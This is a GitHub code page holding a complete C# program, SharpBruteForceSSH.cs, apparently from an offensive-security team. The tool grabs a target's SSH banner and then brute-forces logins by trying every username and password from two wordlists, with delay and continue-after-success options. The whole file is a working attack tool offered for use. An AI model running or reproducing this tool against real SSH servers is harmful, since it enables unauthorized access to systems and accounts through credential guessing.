-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathSharpBruteForceSSH.cs
193 lines (173 loc) · 6.4 KB
/
SharpBruteForceSSH.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
using System;
using System.IO;
using System.Net.Sockets;
using System.Text;
using Renci.SshNet;
class AuthenticationResult
{
public bool Success { get; set; }
public bool ServiceAvailable { get; set; }
}
class Program
{
static void Main(string[] args)
{
if (args.Length < 3)
{
Console.WriteLine("Usage: sshBruteForce.exe <target> <usernameFile> <passwordFile> [-delay <seconds>] [-threads <number>] [--continue]");
return;
}
string target = args[0];
string usernameFile = args[1];
string passwordFile = args[2];
int delay = 0;
int threads = 1;
bool continueAfterSuccess = false;
for (int i = 3; i < args.Length; i++)
{
if (args[i] == "-delay" && i + 1 < args.Length)
{
delay = int.Parse(args[i + 1]);
i++;
}
else if (args[i] == "-threads" && i + 1 < args.Length)
{
threads = int.Parse(args[i + 1]);
i++;
}
else if (args[i] == "--continue")
{
continueAfterSuccess = true;
}
else
{
Console.WriteLine("Unknown argument: " + args[i]);
return;
}
}
Console.WriteLine("\n\tDictionary brute force attack on SSH services");
Console.WriteLine("\n\tBy Hernan Rodriguez Team offsec Perú");
Console.WriteLine("\t---------------------------------------------\n");
Console.WriteLine("\n\tAttempting to retrieve SSH server banner for " + target + "...\n");
string sshBanner = GetSshBanner(target);
if (sshBanner != null)
{
Console.WriteLine("SSH Server banner: " + sshBanner);
}
else
{
Console.WriteLine("Failed to grab SSH server banner: Server did not respond with SSH protocol identification.");
return;
}
Console.WriteLine("\n\tBrute forcing passwords for " + target + "...\n");
bool foundValidCredentials = false;
using (StreamReader usernameReader = new StreamReader(usernameFile))
{
string username;
while ((username = usernameReader.ReadLine()) != null)
{
using (StreamReader passwordReader = new StreamReader(passwordFile))
{
string password;
while ((password = passwordReader.ReadLine()) != null)
{
if (foundValidCredentials && !continueAfterSuccess)
{
break;
}
Console.WriteLine("Trying username: " + username.PadRight(15) + " Password: " + password.PadRight(15) + " ... ");
var authenticationResult = sshConnection(target, username, password);
if (authenticationResult.Success)
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Authentication successful for username: " + username + " - Service is available.");
Console.ResetColor();
foundValidCredentials = true;
if (!continueAfterSuccess)
{
return;
}
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Failed to authenticate for username: " + username + " - Service is " + (authenticationResult.ServiceAvailable ? "available." : "not available."));
Console.ResetColor();
}
if (delay > 0)
{
System.Threading.Thread.Sleep(1000 * delay);
}
}
}
}
}
if (!foundValidCredentials)
{
Console.WriteLine("No valid credentials found.");
}
}
static AuthenticationResult sshConnection(string target, string username, string password)
{
AuthenticationResult result = new AuthenticationResult();
try
{
using (TcpClient tcpClient = new TcpClient())
{
IAsyncResult asyncResult = tcpClient.BeginConnect(target, 22, null, null);
bool success = asyncResult.AsyncWaitHandle.WaitOne(TimeSpan.FromSeconds(5));
if (!success)
{
// Failed to connect to the SSH service
result.ServiceAvailable = false;
return result;
}
}
using (var client = new SshClient(target, username, password))
{
client.Connect();
if (client.IsConnected)
{
client.Disconnect();
result.Success = true;
result.ServiceAvailable = true;
}
}
}
catch (Exception)
{
result.Success = false;
result.ServiceAvailable = true; // Service is available but authentication failed
}
return result;
}
static string GetSshBanner(string target)
{
try
{
using (TcpClient client = new TcpClient(target, 22))
{
using (NetworkStream stream = client.GetStream())
{
byte[] data = new byte[2024];
StringBuilder responseBuilder = new StringBuilder();
int bytesRead;
while ((bytesRead = stream.Read(data, 0, data.Length)) > 0)
{
responseBuilder.Append(Encoding.ASCII.GetString(data, 0, bytesRead));
if (responseBuilder.ToString().Contains("\n"))
{
break;
}
}
return responseBuilder.ToString().Trim();
}
}
}
catch (Exception)
{
// Ignore exceptions for banner grabbing
}
return null;
}
}